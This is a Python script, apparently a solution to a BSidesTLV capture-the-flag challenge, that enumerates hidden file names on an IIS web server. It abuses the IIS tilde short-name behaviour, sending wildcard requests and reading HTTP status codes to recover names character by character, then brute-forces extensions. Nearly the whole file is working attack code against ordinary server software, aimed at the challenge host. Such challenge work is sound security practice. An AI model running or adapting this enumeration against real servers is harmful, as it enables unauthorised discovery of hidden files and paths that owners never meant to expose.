/
iis_steroids.py
70 lines (65 loc) · 2.78 KB
/
iis_steroids.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
import requests
import string
import time
import mimetypes
def recursive_find_chars(filename, bad_char=None, tree_num=0):
start_len = len(filename)
filenames = []
try_chars = [char for char in string.printable if char not in string.ascii_uppercase and char not in '#$%&()*+,-.\/:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c']
if bad_char:
try_chars.remove(bad_char)
for char in try_chars:
print('\n-------------------')
print('Tree num: ', tree_num)
print('Current filename: ', filename)
print('Trying char: ', char)
r = requests.get('http://iis.challenges.bsidestlv.com/{0}{1}*~1*/.aspx'.format(filename, char))
print(r.text)
if r.status_code == 200 or 'BSidesTLV{' in r.text:
raise Exception('\nRESULT\nRESULT\nRESULT\nRESULT\n')
print('-------------------')
if r.status_code == 404:
recursive_search = recursive_find_chars(filename, bad_char=char, tree_num=tree_num + 1)
if recursive_search:
filenames.append(recursive_search)
filename += char
if start_len == len(filename):
filenames.append(filename)
return filenames
def find_chars():
try_chars = [char for char in string.printable if char not in string.ascii_uppercase and char not in '#$%&()*+,-.\/:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c']
filename = ''
while True:
for char in try_chars:
print('\n-------------------')
print('Current filename: ', filename)
print('Trying char: ', char)
r = requests.get('http://iis.challenges.bsidestlv.com/{0}{1}*~1*/.aspx'.format(filename, char))
print(r.text)
print('-------------------')
if r.status_code == 404:
filename += char
break
print('\nFilename: ' + filename)
def try_extensions(exts, filename='', exit_on_find=False):
while True:
for ext in exts:
print('\n-------------------')
print('Trying ext: ', ext)
r = requests.get('http://iis.challenges.bsidestlv.com/' + filename + ext)
print('http://iis.challenges.bsidestlv.com/' + filename + ext)
print(r.text)
if r.status_code != 400:
print('\nRESULT\nRESULT\nRESULT\nRESULT\n')
if exit_on_find:
break
print('-------------------')
filename = filename[:-1]
def main():
#find_chars()
#try_extensions(mimetypes.types_map, filename='l3v3lupah1dd3n', exit_on_find=True)
#try_extensions(['~1/.aspx', '~1.%3F/.aspx', '~1.%3F%3F/.aspx', '~1.%3F%3F%3F/.aspx'], filename='l3v3lupah1dd3n')
filenames = recursive_find_chars('')
print('END RESULT FILENAMES: {0}'.format(filenames))
if __name__ == '__main__':
main()